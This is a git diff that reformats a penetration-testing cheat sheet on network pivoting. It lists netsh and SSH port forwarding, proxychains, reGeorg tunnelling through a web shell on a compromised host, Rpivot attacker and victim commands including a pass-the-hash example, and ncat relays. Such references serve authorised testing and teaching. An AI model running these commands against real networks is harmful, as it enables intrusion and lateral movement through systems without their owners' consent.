Markdown formatting update

2026-03-01 15:03:12 -08:00 · 2018-08-12 23:30:22 +02:00
parent 177c12cb79
commit 65654f81a4
40 changed files with 1375 additions and 827 deletions
--- a/Resources/Network
+++ b/Resources/Network
@@ -1,20 +1,22 @@
 # Network Pivoting Techniques

 ## Windows netsh Port Forwarding
+
 ```powershell
 netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport

 netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110
 ```
+
 1. listenaddress – is a local IP address waiting for a connection.
 2. listenport – local listening TCP port (the connection is waited on it).
 3. connectaddress – is a local or remote IP address (or DNS name) to which the incoming connection will be redirected.
 4. connectport – is a TCP port to which the connection from listenport is forwarded to.

-
 ## SSH

 ### SOCKS Proxy
+
 ```bash
 ssh -D8080 [user]@[host]

@@ -24,64 +26,75 @@ ssh -N -f -D 9000 [user]@[host]
 ```

 ### Local Port Forwarding
+
 ```bash
 ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
 ```

-
 ### Remote Port Forwarding
+
 ```bash
 ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
 ```

 ## Proxychains
+
 **Config file**: /etc/proxychains.conf
+
 ```bash
 [ProxyList]
 socks4 localhost 8080
 ```
+
 Set the SOCKS4 proxy then `proxychains nmap 192.168.5.6`

 ## Web SOCKS - reGeorg
-```
+
+[reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
+
+```python
 python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp
 ```

 ## Rpivot

 Server (Attacker box)
+
 ```python
 python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0
 ```

 Client (Compromised box)
+
 ```python
 python client.py --server-ip <ip> --server-port 9443
 ```

 Through corporate proxy
+
 ```python
 python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
 --ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e
 ```

 Passing the hash
+
 ```python
 python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
 --ntlm-proxy-port 8080 --domain CORP --username jdoe \
 --hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE
 ```

-
 ## Basic Pivoting Types
+
 | Type              | Use Case                                    |
 | :-------------    | :------------------------------------------ |
 | Listen - Listen   | Exposed asset, may not want to connect out. |
 | Listen - Connect  | Normal redirect.                            |
 | Connect - Connect | Can’t bind, so connect to bridge two hosts  |

-
 ## Listen - Listen
+
 | Type              | Use Case                                    |
 | :-------------    | :------------------------------------------ |
 | ncat              | `ncat -v -l -p 8080 -c "ncat -v -l -p 9090"`|
@@ -89,8 +102,8 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro
 | remote host 1     | `ncat localhost 8080 < file`                |
 | remote host 2     | `ncat localhost 9090 > newfile`             |

-
 ## Listen - Connect
+
 | Type              | Use Case                                                        |
 | :-------------    | :------------------------------------------                     |
 | ncat              | `ncat -l -v -p 8080 -c "ncat localhost 9090"`                   |
@@ -98,8 +111,8 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro
 | remote host 1     | `ncat localhost -p 8080 < file`                                 |
 | remote host 2     | `ncat -l -p 9090 > newfile`                                     |

-
 ## Connect - Connect
+
 | Type              | Use Case                                                                   |
 | :-------------    | :------------------------------------------                                |
 | ncat              | `ncat localhost 8080 -c "ncat localhost 9090"`                             |
@@ -107,7 +120,7 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro
 | remote host 1     | `ncat -l -p 8080 < file                                                    |
 | remote host 2     | `ncat -l -p 9090 > newfile`                                                |

-
 ## Thanks to
- * [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/)
- * [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/)
+
+* [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/)
+* [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/)